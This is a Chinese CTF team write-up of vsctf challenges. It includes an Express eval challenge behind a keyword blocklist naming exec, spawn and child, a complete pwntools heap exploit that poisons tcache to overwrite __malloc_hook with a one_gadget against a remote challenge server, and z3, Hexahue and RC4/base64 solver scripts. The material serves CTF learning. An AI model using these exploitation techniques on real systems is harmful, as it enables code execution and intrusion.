声明
本文作者:CTF战队
本文字数:4000
阅读时长:10~20min
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
源码里发现 flag
题目给了源码
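const express = require('express');
const app = express();

/**
 * Encode every character of `s` as a decimal HTML numeric character reference
 * (`a` -> `&#97;`), so the result is inert when placed in element content.
 *
 * Fix: the original pattern `/./g` skipped line terminators and, lacking the
 * `u` flag, split astral characters into two surrogate code units, emitting
 * `&#55357;&#56832;`-style references that HTML parsers treat as errors and
 * render as U+FFFD. `[\s\S]` with the `u` flag matches every code point once.
 *
 * @param {*} s - Value to encode; it is coerced with a template literal first,
 *   so `undefined` becomes the encoded text "undefined" and a Buffer is
 *   encoded as its UTF-8 string form.
 * @returns {string} The encoded text (empty string for empty input).
 */
function escape(s) {
  return `${s}`.replace(/[\s\S]/gu, (c) => `&#${c.codePointAt(0)};`);
}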
/**
 * Render the requested metadata fields as an HTML `<dl>`.
 *
 * Each value goes through escape() before it is placed inside `<pre>`, so the
 * file contents (and the flag, if requested) are rendered as text. Keys are
 * interpolated verbatim; the only caller passes a fixed list. A key that is
 * not an own property of `values` still resolves through the object
 * prototype (e.g. "constructor"), and an unknown key renders the text
 * "undefined" — both kept as in the original.
 *
 * @param {string[]} keys - Field names to render, in order.
 * @returns {string} The `<dl>` markup.
 */
function directory(keys) {
  const values = {
    "title": "View Source CTF",
    "description": "Powered by Node.js and Express.js",
    "flag": process.env.FLAG,
    "lyrics": "Good job, you’ve made it to the bottom of the mind control facility. Well done.",
    "createdAt": "1970-01-01T00:00:00.000Z",
    "lastUpdate": "2022-02-22T22:22:22.222Z",
    // This file's own source text, re-read on every call.
    "source": require('fs').readFileSync(__filename),
  };
  const items = [];
  for (const key of keys) {
    const body = escape(values[key]);
    items.push(`<dt>${key}</dt><dd><pre>${body}</pre></dd>`);
  }
  return `<dl>${items.join("")}</dl>`;
}
// GET /: with a string `payload` query parameter the handler evaluates it;
// otherwise it renders the public metadata (including this file's source).
app.get('/', (req, res) => {
  const payload = req.query.payload;
  if (payload && typeof payload === "string") {
    // Blocklist "WAF": one character class plus keywords, case-insensitive.
    // A blocklist in front of eval() cannot enumerate every way to express a
    // dangerous JavaScript expression, so it does not make the eval below
    // safe (the challenge flag text says as much). `process` is listed twice;
    // the duplicate is harmless. exec() returns only the first match, with
    // matches[0] the whole match and matches[1] the capture group, so the 400
    // body shows that one token twice.
    const matches = /([\.\(\)'"\[\]\{\}<>_$%\\xu^;=]|import|require|process|proto|constructor|app|express|req|res|env|process|fs|child|cat|spawn|fork|exec|file|return|this|toString)/gi.exec(payload);
    if (matches) {
      res.status(400).send(matches.map(i => `<code>${i}</code>`).join("<br>"));
    } else {
      // SECURITY: eval() of request-controlled input is code execution inside
      // the server process — the intended vulnerability of this challenge.
      // Never evaluate request data; map it onto a fixed set of operations.
      res.send(`${eval(payload)}`);
    }
  } else {
    // "flag" and "lyrics" are not in this list, so the default page does not
    // render them.
    res.send(directory(["title", "description", "lastUpdate", "source"]));
  }
});
// PORT comes from the environment. The log line names the loopback address,
// but no host is passed to listen(), so Node binds the unspecified address
// (all interfaces) — NOTE(review): confirm the intended exposure.
app.listen(process.env.PORT, () => {
  console.log(`Server started on http://127.0.0.1:${process.env.PORT}`);
});
应该只需要拿到环境变量里的flag就可以了。vsctf{regExAin’tGoodEnufForWAF}
堆溢出,改top chunk的size然后构造出unsorted bin泄露libc,最后打tcache,改malloc_hook为one_gadget
from pwn import *
# context.log_level = 'debug'

# Target binary. `local` selects a locally spawned process (with the system
# libc) versus the remote CTF instance (with the libc shipped alongside the
# challenge); the libc choice matters because the symbol offsets read from it
# are used for the leak/overwrite arithmetic below.
binary = './ezorange'
local = 0
if local:
    p = process(binary)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('104.197.118.147', 10160)
    libc = ELF('./libc.so.6')
elf = ELF(binary)
def add(index, size):
    """Drive menu option 1 of the target: answer the index and size prompts.

    Uses the module-level tube ``p``; judging by the 'Size: ' prompt this is
    the program's allocation action.
    """
    answers = (('> ', '1'), ('number: ', str(index)), ('Size: ', str(size)))
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
def edit(index, content_index, content):
    """Drive menu option 2 of the target: write ``content`` at byte offset
    ``content_index`` of slot ``index``.

    Uses the module-level tube ``p``. Every argument is sent as its decimal
    string form.
    """
    answers = (
        ('> ', '2'),
        ('number: ', str(index)),
        ('index: ', str(content_index)),
        ('New value: ', str(content)),
    )
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
def edit2(index, content_index):
    """Use menu option 2 as a read: fetch the 'Current value' shown for byte
    ``content_index`` of slot ``index``, echo it back unchanged, return it.

    Uses the module-level tube ``p`` and pwntools' ``success`` logger.
    Returns the value parsed as a base-10 int.
    """
    for prompt, reply in (('> ', '2'), ('number: ', str(index)), ('index: ', str(content_index))):
        p.sendlineafter(prompt, reply)
    p.recvuntil('Current value: ')
    shown = p.recvuntil(b'\n', drop=True).decode()
    value = int(shown, 10)
    success('value -> {}'.format(hex(value)))
    # Writing the same value back leaves the byte untouched.
    p.sendlineafter('New value: ', str(value))
    return value
# gdb.attach(p)

# NOTE(review): indentation was lost in the page; loop bodies below are
# restored from the repeated allocation pattern at the 0xa10/0x500/0x1000 lines
# — confirm against the original script.

# Stage 1 — libc leak (write-up: overwrite the top-chunk size, then leak via
# the unsorted bin). edit() writes one byte past chunk 1 at 0x10a; after the
# 0x1000 allocation, edit2() reads pointer bytes back one at a time.
add(0, 0x100)
add(1, 0x100)
edit(1, 0x10a, 0x0)
add(0, 0x1000)
edit2(1, 0x110)
libc_base = edit2(1, 0x110)
for i in range(5):
    libc_base = (edit2(1, 0x111+i) << 8*(i+1)) + libc_base
# 0x70 is the distance from the leaked pointer to __malloc_hook on this libc
# build (author's value; re-derive for any other libc).
libc_base = libc_base - 0x70 - libc.sym['__malloc_hook']
success('libc_base -> {}'.format(hex(libc_base)))
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('malloc_hook -> {}'.format(hex(malloc_hook)))
# Stage 2 — heap grooming; the sizes and offsets are tied to the author's
# heap layout.
add(1, 0xa10)
add(1, 0x500)
edit(1, 0x50a, 0x0)
add(1, 0x1000)
add(1, 0x9a0)
add(1, 0x500)
add(0, 0x100)
# Five bytes read at 0x22000.. are assembled into `key`, which is XORed with the
# target pointer below — presumably glibc's tcache pointer mangling value; the
# +0x66 adjustment is from the author's run. TODO confirm.
key = edit2(0, 0x22000)
for i in range(4):
    key = (edit2(0, 0x22001+i) << 8*(i+1)) + key
key += 0x66
success('key -> {}'.format(hex(key)))
for i in range(3):
    edit(1, 0x50a, 0x0)
    add(1, 0x1000)
    add(1, 0x9a0)
    add(1, 0x500)
add(1, 0x100)
add(1, 0x100)
# Stage 3 — write the mangled __malloc_hook address byte by byte at 0x88000
# (write-up: tcache attack), then allocate until the hook is served.
for i in range(6):
    edit(0, 0x88000+i, ((malloc_hook ^ key) >> i*8) & 0xff)
add(1, 0x100)
# one_gadget offsets for this libc (author's values); index 1 is used.
one_gadget = [0xceb6e, 0xceb71, 0xceb74]
add(1, 0x100)
for i in range(8):
    edit(1, i, ((libc_base + one_gadget[1]) >> i*8) & 0xff)
add(1, 0x100)
p.interactive()
# vsctf{[email protected][email protected][email protected]_1834499ab76bff54ceff72af11ca55e0}
# vsctf{[email protected][email protected][email protected]_1834499ab76bff54ceff72af11ca55e0}
加群就能看到~
需要对应翻译出来。https://www.omniglot.com/conscripts/hexahue.php
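"""Decode a Hexahue strip image into text.

Fixes over the original script: the glyph count is derived from the image
width instead of the hard-coded 3711, an unrecognised glyph yields '?' instead
of aborting with KeyError, the image is forced to RGB so the 3-tuple table
keys match, the text is built with join() rather than repeated concatenation,
and the unused ``pix``/``height`` variables are gone. Pillow is imported only
in main(), so the table and decoder can be imported without it.
"""

white = (255, 255, 255)
black = (0, 0, 0)
red = (255, 0, 0)
green = (0, 255, 0)
blu = (0, 0, 255)
yellow = (255, 255, 0)
light_blue = (0, 255, 255)
magenta = (255, 0, 255)
gray = (128, 128, 128)

# Hexahue alphabet. Each glyph is a 2-column x 3-row grid of colour cells,
# keyed here in reading order: (row1 left, row1 right, row2 left, row2 right,
# row3 left, row3 right). Reference: omniglot.com/conscripts/hexahue.php
hexahue = {
    (magenta, red, green, yellow, blu, light_blue): 'a',
    (red, magenta, green, yellow, blu, light_blue): 'b',
    (red, green, magenta, yellow, blu, light_blue): 'c',
    (red, green, yellow, magenta, blu, light_blue): 'd',
    (red, green, yellow, blu, magenta, light_blue): 'e',
    (red, green, yellow, blu, light_blue, magenta): 'f',
    (green, red, yellow, blu, light_blue, magenta): 'g',
    (green, yellow, red, blu, light_blue, magenta): 'h',
    (green, yellow, blu, red, light_blue, magenta): 'i',
    (green, yellow, blu, light_blue, red, magenta): 'j',
    (green, yellow, blu, light_blue, magenta, red): 'k',
    (yellow, green, blu, light_blue, magenta, red): 'l',
    (yellow, blu, green, light_blue, magenta, red): 'm',
    (yellow, blu, light_blue, green, magenta, red): 'n',
    (yellow, blu, light_blue, magenta, green, red): 'o',
    (yellow, blu, light_blue, magenta, red, green): 'p',
    (blu, yellow, light_blue, magenta, red, green): 'q',
    (blu, light_blue, yellow, magenta, red, green): 'r',
    (blu, light_blue, magenta, yellow, red, green): 's',
    (blu, light_blue, magenta, red, yellow, green): 't',
    (blu, light_blue, magenta, red, green, yellow): 'u',
    (light_blue, blu, magenta, red, green, yellow): 'v',
    (light_blue, magenta, blu, red, green, yellow): 'w',
    (light_blue, magenta, red, blu, green, yellow): 'x',
    (light_blue, magenta, red, green, blu, yellow): 'y',
    (light_blue, magenta, red, green, yellow, blu): 'z',
    (black, white, white, black, black, white): '.',
    (white, black, black, white, white, black): ',',
    (white, white, white, white, white, white): ' ',
    (black, black, black, black, black, black): ' ',
    (black, gray, white, black, gray, white): '0',
    (gray, black, white, black, gray, white): '1',
    (gray, white, black, black, gray, white): '2',
    (gray, white, black, gray, black, white): '3',
    (gray, white, black, gray, white, black): '4',
    (white, gray, black, gray, white, black): '5',
    (white, black, gray, gray, white, black): '6',
    (white, black, gray, white, gray, black): '7',
    (white, black, gray, white, black, gray): '8',
    (black, white, gray, white, black, gray): '9',
}

GLYPH_WIDTH = 30        # horizontal pitch between consecutive glyphs, in pixels
SAMPLE_X = (10, 20)     # x offsets inside a glyph: one per column
SAMPLE_Y = (10, 20, 30)  # y offsets: one per row


def read_glyph(get_pixel, n):
    """Sample the six cells of glyph ``n`` and return them as a table key.

    ``get_pixel`` is called with an ``(x, y)`` tuple and must return a colour
    sequence; it is converted to a tuple so it can be used as a dict key.
    Cells are returned in reading order (rows outer, columns inner).
    """
    return tuple(
        tuple(get_pixel((x + n * GLYPH_WIDTH, y)))
        for y in SAMPLE_Y
        for x in SAMPLE_X
    )


def decode_hexahue(get_pixel, count, table=hexahue, unknown='?'):
    """Decode ``count`` consecutive glyphs into a string.

    ``get_pixel`` is as for read_glyph(); ``table`` maps 6-colour keys to
    characters; a glyph missing from ``table`` becomes ``unknown`` rather than
    raising. Returns '' when ``count`` is 0.
    """
    return "".join(table.get(read_glyph(get_pixel, n), unknown) for n in range(count))


def main(path='1.png'):
    """Open the strip image, decode every full glyph across its width, print it."""
    from PIL import Image  # local import: the decoder above is usable without Pillow

    # convert('RGB') guarantees 3-tuples from getpixel, so RGBA or palette
    # images still match the table keys.
    im = Image.open(path).convert('RGB')
    width = im.size[0]
    count = width // GLYPH_WIDTH
    flag = decode_hexahue(im.getpixel, count)
    print(flag)


if __name__ == '__main__':
    main()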
用 PIL 写了个脚本,逐格提取颜色并与 Hexahue 表进行匹配
lorem ipsum dolor sit amet consectetur adipiscing elit sed do eiusmod tempor incididunt ut labore et dolore magna aliqua lectus sit amet est placerat in amet cursus sit amet dictum purus sit amet volutpat consequat mauris nunc posuere ac ut consequat semper viverra nam libero justo at risus viverra adipiscing at in tellus integer feugiat sem viverra aliquet eget sit amet tellus gravida dictum fusce ut placerat orci nulla pellentesque cursus risus at ultrices mi tempus imperdiet nulla maecenas accumsan lacus vel facilisis volutpat est velit aenean vel elit scelerisque mauris pellentesque pulvinar message vel turpis nunc eget lorem dolor sed nisi lacus sed viverra tellus in hac non pulvinar neque laoreet suspendisse interdum consectetur libero eget lorem dolor sed viverra ipsum nunc aliquet bibendum enim a cras semper auctor neque vitae tempus quam lectus urna duis convallis convallis tellus id interdum pretium nibh ipsum consequat nisl vel pretium lectus quam risus pretium quam vulputate dignissim eu consequat ac felis donec et duis tristique sollicitudin nibh sit amet ultrices gravida dictum fusce ut placerat orci nulla pellentesque ac turpis egestas integer eget aliquet nibh message pellentesque id nibh tortor id aliquet lectus ut tristique et egestas quis donec massa sapien message faucibus et molestie ac feugiat sed lectus pharetra massa massa ultricies mi quis hendrerit dolor magna velit euismod in pellentesque massa et malesuada fames ac turpis egestas maecenas pharetra convallis bibendum ut tristique et egestas quis a arcu cursus vitae congue mauris rhoncus aenean semper viverra nam libero justo laoreet sit lacus sed turpis tincidunt id aliquet lacus vestibulum message sed arcu non odio euismod lacinia the message you seek is ihatehexahuesomuchpleasehelp sociis natoque penatibus et magnis dis parturient montes nascetur elit at imperdiet dui accumsan sit amet nulla facilisi id venenatis a condimentum vitae sapien pellentesque habitant enim blandit volutpat 
maecenas volutpat blandit aliquam etiam ut sem nulla pharetra diam sit amet in eu mi bibendum neque egestas congue quisque egestas diam cursus vitae congue mauris rhoncus aenean vel elit faucibus in ornare quam viverra orci sagittis eu ante in nibh mauris cursus mattis molestie a vel fringilla est ullamcorper eget consectetur adipiscing elit pellentesque habitant morbi tristique urna molestie at elementum eu facilisis sed odio elit pellentesque habitant morbi tristique volutpat blandit aliquam etiam erat velit scelerisque in sollicitudin aliquam ultrices sagittis orci a elementum eu facilisis sed odio morbi quis vulputate enim nulla aliquet porttitor lacus luctus accumsan tortor posuere morbi tristique senectus message et netus et malesuada fames magna etiam tempor orci eu lobortis elementum sed felis eget velit aliquet sagittis dui ut ornare lectus sit amet est fermentum et sollicitudin ac orci phasellus egestas tellus viverra nam libero justo laoreet sit amet cursus lectus vestibulum mattis ullamcorper velit sed ullamcorper morbi tincidunt nunc pulvinar sapien et ligula ullamcorper malesuada proin libero adipiscing at in tellus integer massa sed elementum tempus egestas sed sed risus pretium quam morbi non arcu risus quis varius quam quisque id diam tempus urna et pharetra pharetra massa massa ultricies mi et molestie ac feugiat sed lectus vestibulum mattis eu scelerisque felis imperdiet proin in ornare quam viverra orci fringilla est ullamcorper eget nulla diam vel quam elementum pulvinar etiam feugiat sed lectus vestibulum mattis ullamcorper velit purus semper eget duis at tellus at urna condimentum mattis
vsctf{IHATEHEXAHUESOMUCHPLEASEHELP}
数电题:依次调出 7 个二进制值并转成字符串,注意补上符号位,得到 vsctf{10Gi}
从十六进制内容看像是 Windows 磁盘镜像,题目要找 Roblox 用户名;在 Chrome 记录中发现 vsctf{ftcsvisgreat}
需要先找到 key,再 nc 连上服务拿 flag。check 部分:key 长度为 35,每隔 5 位是一个 -,其余约束用 z3 求解
z3解方程
from z3 import *

# One 8-bit symbolic byte per key character (the key is 35 bytes long).
a1 = [z3.BitVec("p%d" % i, 8)for i in range(35)]
s=Solver()
# Arithmetic relations recovered from the checker.
# NOTE(review): the variables are 8-bit and z3 coerces the Python constants
# (13713, -6256, 20604, ...) to the same width, so these equalities are
# effectively modulo 256 — confirm this matches the checker's own arithmetic
# width (the author's model was accepted by the service, see the key below).
s.add(a1[26] + a1[24] + a1[15] + a1[13] + a1[4] + a1[2] + a1[0] + a1[28] == 486)
s.add(a1[1] * a1[0] - a1[4] + a1[12] * a1[13] - a1[16] + a1[24] * a1[25] - a1[28] == 13713)
s.add(a1[27] * a1[14] * a1[3] - a1[15] * a1[2] * a1[25] == -6256)
s.add((a1[1] - a1[3]) * a1[4] == 48)
s.add((8 * a1[13] - 4 * a1[15]) * a1[14] == 20604)
s.add((4 * a1[28] - 4 * a1[0]) * a1[27] == -5616)
s.add(a1[4] - a1[3] - a1[2] - a1[1] + a1[0] * a1[0] == 6744)
s.add(a1[16] - a1[15] - a1[14] - a1[13] + a1[12] * a1[12] == 2405)
s.add(a1[28] - a1[27] - a1[26] - a1[25] + a1[24] * a1[24] == 4107)
s.add(a1[14] <= 57)
s.add((a1[14] + a1[24]) * (a1[28] - a1[1]) == -1508)
# Helper used to list the positions the first-stage checker constrains
# (i % 12 <= 4, i.e. 0-4, 12-16, 24-28); its output is the list b below.
# for i in range(35):
#     if((i%12)<=4):
#         print(i,end=",")
b=[0,1,2,3,4,12,13,14,15,16,24,25,26,27,28]
# Every byte is printable ASCII, excluding space and DEL.
for i in range(len(a1)):
    s.add(a1[i]>33)
    s.add(a1[i]<127)
# The bytes at positions in b are digits or upper-case letters:
# 47 < x <= 90 with 58..64 (':' .. '@') excluded leaves '0'-'9' and 'A'-'Z'.
for i in range(len(b)):
    s.add(a1[b[i]] <=90)
    s.add(a1[b[i]] > 47)
    s.add(a1[b[i]]!=58)
    s.add(a1[b[i]] != 59)
    s.add(a1[b[i]] != 60)
    s.add(a1[b[i]] != 61)
    s.add(a1[b[i]] != 62)
    s.add(a1[b[i]] != 63)
    s.add(a1[b[i]] != 64)
# Repeats the a1[14] <= 57 constraint added above; harmless.
s.add(a1[14]<=57)
# Positions 5, 11, 17, 23, 29 are the '-' separators (ASCII 45).
for i in range(35):
    if(i%6==5):
        print(i,end=',')
        s.add(a1[i]==45)
print(s.check())
answer=s.model()
print(answer)
# The model's byte values, transcribed by hand from the printed model, shown
# as the key string.
a=[83,69,56,68,48,45,72,72,72,72,72,45,50,75,51,49,80,45,72,72,72,72,72,45,65,68,54,52,56,45,66,72,66,72,72]
for i in range(len(a)):
    print(chr(a[i]),end='')
得到第一层key为
SE8D0-HHHHH-2K31P-HHHHH-AD648-BHBHH
继续向下走,第二层验证是两段H和BH的验证,它把6-10,18-22,30-34拿了出来,进行第二次验证,第二次验证是rc4和base64,所以写出脚本
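import base64
import string

# Second-stage ciphertext: base64 text whose decoded bytes are XORed with a
# fixed 15-byte keystream.
str1="nRYEZjDuqxtlL8L6EatC"
# str1 = "x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q"

# Base64 alphabets: string1 is the one the ciphertext uses, string2 the
# standard one. They are identical here, so the translate() below is a no-op;
# kept so a custom alphabet can be substituted.
string1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# 15-byte keystream (the RC4 output, per the write-up) XORed over the decoded bytes.
r=[0xeb,0x65,0x67,0x12,0x56,0xda,0xc9,0x7e,0x02,0x46,0xac,0x94,0x74,0xd9,0x38]


def decode_key(encoded, keystream, src_alphabet=string1, dst_alphabet=string2):
    """Base64-decode ``encoded`` (after mapping ``src_alphabet`` onto
    ``dst_alphabet``) and XOR each byte with ``keystream``.

    Returns the result as a str of code points 0-255.
    Raises ValueError if ``keystream`` is shorter than the decoded data (the
    original script died with IndexError in that case) or if the base64 text
    is malformed (binascii.Error, a ValueError subclass).
    """
    data = base64.b64decode(encoded.translate(str.maketrans(src_alphabet, dst_alphabet)))
    if len(keystream) < len(data):
        raise ValueError("keystream shorter than decoded data: %d < %d" % (len(keystream), len(data)))
    return "".join(chr(byte ^ k) for byte, k in zip(data, keystream))


# The original printed len(b) here; b is a name from the z3 script above and is
# undefined in this one, so that line has been removed.
flag=base64.b64decode(str1.translate(str.maketrans(string1,string2)))
print(flag)
# end="" keeps the original output (characters printed with no trailing newline).
print(decode_key(str1, r), end="")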
得到最终的key为
SE8D0-vsctf-2K31P-4begi-AD648-nnerz
然后nc
vsctf{you_are_good_at_z3,but_maybe_i_should_play_genshin_impact_first?}